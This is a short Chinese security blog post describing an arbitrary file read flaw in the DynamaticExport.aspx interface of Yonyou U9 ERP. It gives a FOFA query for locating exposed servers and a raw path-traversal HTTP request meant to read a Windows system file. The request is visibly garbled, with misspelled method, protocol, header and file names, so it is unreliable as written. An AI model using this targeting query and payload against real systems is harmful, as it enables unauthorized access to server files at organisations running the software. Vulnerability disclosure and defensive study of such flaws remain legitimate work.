用友U9 DynamaticExport.aspx接口存在任意文件读取漏洞

56次阅读
没有评论

共计 361 个字符,预计需要花费 1 分钟才能阅读完成。

1.漏洞描述

用友U9聚焦中型和中大型制造企业,全面支持业财税档一体化、设计制造一体化、计划执行一体化、营销服务一体化、项目制造一体化等数智制造场景,赋能组织变革和商业创新,融合产业互联网资源实现连接、共享、协同,助力制造企业高质量发展

2.搜索引擎

FOFA

body="logo-u9.png"

3.漏洞复现

CET
/print/ynamaticExport. aspx?filePath=../../../../../../../../../../../.. /windows/winini HTIP/1.1
User-Agent:lozilla/4.0(coupatible;lSIE 8.0: Windows T 6.1)
Accept-Encoding: gzip,deflateAccept:*/*
Connection:close
Host:
用友U9 DynamaticExport.aspx接口存在任意文件读取漏洞
正文完
 0
admin
版权声明:本站原创文章,由 admin 于2025-07-15发表,共计361字。
转载说明:除特殊说明外本站文章皆由CC-4.0协议发布,转载请注明出处。
评论(没有评论)